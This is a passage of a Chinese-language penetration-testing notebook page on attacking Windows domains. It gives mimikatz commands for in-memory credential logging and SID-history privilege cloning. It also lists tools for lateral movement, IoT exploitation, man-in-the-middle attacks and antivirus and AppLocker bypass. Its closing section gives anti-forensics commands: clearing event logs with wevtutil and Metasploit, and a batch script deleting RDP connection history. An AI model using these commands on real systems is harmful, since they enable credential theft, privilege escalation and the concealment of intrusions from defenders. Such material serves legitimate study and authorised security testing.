<p>&#x7B80;&#x5355;&#x7684;&#x7406;&#x89E3;&#x4E3A;SSP&#x5C31;&#x662F;&#x4E00;&#x4E2A;DLL&#xFF0C;&#x7528;&#x6765;&#x5B9E;&#x73B0;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;</p>
<pre class="language-"><code>privilege::debug
misc::memssp
</code></pre><p>&#x8FD9;&#x6837;&#x5C31;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;<code>c:/windows/system32</code>&#x53EF;&#x770B;&#x5230;&#x65B0;&#x751F;&#x6210;&#x7684;&#x6587;&#x4EF6;kiwissp.log</p>
<h4 id="sid-history"><a name="sid-history" class="anchor-navigation-ex-anchor" href="#sid-history"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://adsecurity.org/?p=1772" target="_blank">SID History</a></h4>
<p>SID&#x5386;&#x53F2;&#x8BB0;&#x5F55;&#x5141;&#x8BB8;&#x5C06;&#x4E00;&#x4E2A;&#x5E10;&#x6237;&#x7684;&#x8BBF;&#x95EE;&#x6743;&#x9650;&#x6709;&#x6548;&#x5730;&#x514B;&#x9686;&#x5230;&#x53E6;&#x4E00;&#x4E2A;&#x5E10;&#x6237;</p>
<pre class="language-"><code>mimikatz &quot;privilege::debug&quot; &quot;misc::addsid bobafett ADSAdministrator&quot;
</code></pre><h4 id="adminsdholder&#xFF06;sdprop-"><a name="adminsdholder&#xFF06;sdprop-" class="anchor-navigation-ex-anchor" href="#adminsdholder&#xFF06;sdprop-"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://adsecurity.org/?p=1906" target="_blank">AdminSDHolder&#xFF06;SDProp </a></h4>
<p>&#x5229;&#x7528;AdminSDHolder&#xFF06;SDProp&#xFF08;&#x91CD;&#x65B0;&#xFF09;&#x83B7;&#x53D6;&#x57DF;&#x7BA1;&#x7406;&#x6743;&#x9650; </p>
<h4 id="&#x7EC4;&#x7B56;&#x7565;"><a name="&#x7EC4;&#x7B56;&#x7565;" class="anchor-navigation-ex-anchor" href="#&#x7EC4;&#x7B56;&#x7565;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7EC4;&#x7B56;&#x7565;</h4>
<p><a href="https://adsecurity.org/?p=2716" target="_blank">https://adsecurity.org/?p=2716</a> 
<a href="https://www.anquanke.com/post/id/86531" target="_blank">&#x7B56;&#x7565;&#x5BF9;&#x8C61;&#x5728;&#x6301;&#x4E45;&#x5316;&#x53CA;&#x6A2A;&#x5411;&#x6E17;&#x900F;&#x4E2D;&#x7684;&#x5E94;&#x7528;</a> </p>
<h4 id="hook-passwordchangenotify"><a name="hook-passwordchangenotify" class="anchor-navigation-ex-anchor" href="#hook-passwordchangenotify"><i class="fa fa-link" aria-hidden="true"></i></a>Hook PasswordChangeNotify</h4>
<p><a href="http://wooyun.jozxing.cc/static/drops/tips-13079.html" target="_blank">http://wooyun.jozxing.cc/static/drops/tips-13079.html</a> </p>
<h3 id="tips"><a name="tips" class="anchor-navigation-ex-anchor" href="#tips"><i class="fa fa-link" aria-hidden="true"></i></a>TIPS</h3>
<p><a href="https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Dump Clear-Text Password after KB2871997 installed&#x300B;</a> 
<a href="http://www.vuln.cn/6812" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Hook PasswordChangeNotify&#x300B;</a> </p>
<blockquote>
<p>&#x53EF;&#x901A;&#x8FC7;Hook PasswordChangeNotify&#x5B9E;&#x65F6;&#x8BB0;&#x5F55;&#x57DF;&#x63A7;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x65B0;&#x5BC6;&#x7801; </p>
</blockquote>
<p><a href="http://www.liuhaihua.cn/archives/179102.html" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Local Administrator Password Solution&#x300B; </a></p>
<blockquote>
<p>&#x57DF;&#x6E17;&#x900F;&#x65F6;&#x8981;&#x8BB0;&#x5F97;&#x7559;&#x610F;&#x57DF;&#x5185;&#x4E3B;&#x673A;&#x7684;&#x672C;&#x5730;&#x7BA1;&#x7406;&#x5458;&#x8D26;&#x53F7; </p>
</blockquote>
<p><a href="https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;&#x5229;&#x7528;SYSVOL&#x8FD8;&#x539F;&#x7EC4;&#x7B56;&#x7565;&#x4E2D;&#x4FDD;&#x5B58;&#x7684;&#x5BC6;&#x7801;&#x300B; </a></p>
<h3 id="&#x76F8;&#x5173;&#x5DE5;&#x5177;"><a name="&#x76F8;&#x5173;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x76F8;&#x5173;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x76F8;&#x5173;&#x5DE5;&#x5177;</h3>
<p><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank">BloodHound </a>
<a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank">CrackMapExec </a>
<a href="https://github.com/byt3bl33d3r/DeathStar" target="_blank">DeathStar</a> </p>
<blockquote>
<p>&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;<a href="http://www.freebuf.com/sectool/160884.html" target="_blank">http://www.freebuf.com/sectool/160884.html</a> </p>
</blockquote>
<h2 id="&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;"><a name="&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;" class="anchor-navigation-ex-anchor" href="#&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;</h2>
<ul>
<li>At </li>
<li>Psexec </li>
<li>WMIC </li>
<li>Wmiexec </li>
<li>Smbexec </li>
<li>Powershell remoting </li>
<li>DCOM </li>
</ul>
<h2 id="iot&#x76F8;&#x5173;"><a name="iot&#x76F8;&#x5173;" class="anchor-navigation-ex-anchor" href="#iot&#x76F8;&#x5173;"><i class="fa fa-link" aria-hidden="true"></i></a>IOT&#x76F8;&#x5173;</h2>
<ul>
<li>1&#x3001;&#x8DEF;&#x7531;&#x5668; <a href="https://github.com/reverse-shell/routersploit" target="_blank">routersploit </a></li>
<li>2&#x3001;&#x6253;&#x5370;&#x673A; <a href="https://github.com/RUB-NDS/PRET" target="_blank">PRET </a></li>
<li>3&#x3001;IOT exp <a href="https://www.exploitee.rs/" target="_blank">https://www.exploitee.rs/</a></li>
<li>4&#x3001;&#x76F8;&#x5173; 
<a href="https://www.owasp.org/index.php/OWASP_Nettacker" target="_blank">OWASP-Nettacker</a>
<a href="https://github.com/dark-lbp/isf" target="_blank">isf</a> 
<a href="https://github.com/w3h/icsmaster" target="_blank">icsmaster</a></li>
</ul>
<h2 id="&#x4E2D;&#x95F4;&#x4EBA;"><a name="&#x4E2D;&#x95F4;&#x4EBA;" class="anchor-navigation-ex-anchor" href="#&#x4E2D;&#x95F4;&#x4EBA;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4E2D;&#x95F4;&#x4EBA;</h2>
<ul>
<li><a href="http://www.oxid.it/cain.html" target="_blank">Cain</a> </li>
<li><a href="https://github.com/Ettercap/ettercap" target="_blank">Ettercap</a> </li>
<li><a href="https://github.com/SpiderLabs/Responder" target="_blank">Responder</a> </li>
<li><a href="https://github.com/byt3bl33d3r/MITMf" target="_blank">MITMf</a> </li>
<li><a href="https://github.com/evilsocket/bettercap" target="_blank">bettercap</a> </li>
</ul>
<h2 id="&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;"><a name="&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;" class="anchor-navigation-ex-anchor" href="#&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;</h2>
<h3 id="bypass-applocker"><a name="bypass-applocker" class="anchor-navigation-ex-anchor" href="#bypass-applocker"><i class="fa fa-link" aria-hidden="true"></i></a>Bypass Applocker</h3>
<p><a href="https://github.com/api0cradle/UltimateAppLockerByPassList" target="_blank">UltimateAppLockerByPassList </a>
<a href="https://lolbas-project.github.io/" target="_blank">https://lolbas-project.github.io/</a> </p>
<h3 id="bypassav"><a name="bypassav" class="anchor-navigation-ex-anchor" href="#bypassav"><i class="fa fa-link" aria-hidden="true"></i></a>bypassAV</h3>
<ul>
<li>Empire </li>
<li>PEspin </li>
<li>Shellter </li>
<li>Ebowla </li>
<li>Veil </li>
<li>PowerShell </li>
<li>Python </li>
<li><a href="http://www.4hou.com/technology/9379.html" target="_blank">&#x4EE3;&#x7801;&#x6CE8;&#x5165;&#x6280;&#x672F;Process Doppelg&#xE4;nging </a></li>
<li>...</li>
</ul>
<h1 id="&#x75D5;&#x8FF9;&#x6E05;&#x7406;"><a name="&#x75D5;&#x8FF9;&#x6E05;&#x7406;" class="anchor-navigation-ex-anchor" href="#&#x75D5;&#x8FF9;&#x6E05;&#x7406;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x75D5;&#x8FF9;&#x6E05;&#x7406;</h1>
<h2 id="windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;"><a name="windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;" class="anchor-navigation-ex-anchor" href="#windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/" target="_blank">Windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;</a></h2>
<p>&#x83B7;&#x53D6;&#x65E5;&#x5FD7;&#x5206;&#x7C7B;&#x5217;&#x8868;&#xFF1A;</p>
<pre class="language-"><code>wevtutil el &gt;1.txt
</code></pre><p>&#x83B7;&#x53D6;&#x5355;&#x4E2A;&#x65E5;&#x5FD7;&#x7C7B;&#x522B;&#x7684;&#x7EDF;&#x8BA1;&#x4FE1;&#x606F;&#xFF1A;
eg.</p>
<pre class="language-"><code>wevtutil gli &quot;windows powershell&quot;
</code></pre><p>&#x56DE;&#x663E;&#xFF1A;</p>
<pre class="language-"><code>creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
</code></pre><p>&#x67E5;&#x770B;&#x6307;&#x5B9A;&#x65E5;&#x5FD7;&#x7684;&#x5177;&#x4F53;&#x5185;&#x5BB9;&#xFF1A;</p>
<pre class="language-"><code>wevtutil qe /f:text &quot;windows powershell&quot;
</code></pre><p>&#x5220;&#x9664;&#x5355;&#x4E2A;&#x65E5;&#x5FD7;&#x7C7B;&#x522B;&#x7684;&#x6240;&#x6709;&#x4FE1;&#x606F;&#xFF1A;</p>
<pre class="language-"><code>wevtutil cl &quot;windows powershell&quot;
</code></pre><h2 id="&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;"><a name="&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;" class="anchor-navigation-ex-anchor" href="#&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7834;&#x574F;Windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;</h2>
<p>&#x5229;&#x7528;&#x5DE5;&#x5177; </p>
<ul>
<li><a href="https://github.com/hlldz/Invoke-Phant0m" target="_blank">Invoke-Phant0m</a> </li>
<li><a href="https://github.com/3gstudent/Windwos-EventLog-Bypass" target="_blank">Windwos-EventLog-Bypass</a> </li>
</ul>
<h2 id="msf"><a name="msf" class="anchor-navigation-ex-anchor" href="#msf"><i class="fa fa-link" aria-hidden="true"></i></a>msf</h2>
<pre class="language-"><code>run clearlogs
</code></pre><pre class="language-"><code>clearev
</code></pre><h2 id="3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;"><a name="3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;" class="anchor-navigation-ex-anchor" href="#3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;"><i class="fa fa-link" aria-hidden="true"></i></a>3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;</h2>
<pre class="language-"><code>@echo off
@reg delete &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&quot; /va /f
@del &quot;%USERPROFILE%\My Documents\Default.rdp&quot; /a
@exit
</code></pre><footer class="page-footer"><span class="copyright">Copyright &#xA9; DarkNote 2020. QQ&#x8BA8;&#x8BBA;&#x7FA4;&#xFF1A;10000</span><span class="footer-modification">&#x8BE5;&#x6587;&#x4EF6;&#x4FEE;&#x8BA2;&#x65F6;&#x95F4;&#xFF1A;
2020-03-07 20:56:34
</span></footer>
                                
                                </section>
                            
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                
                
            
        
    </div>

</div>

        
        
    

    </body>
</html>

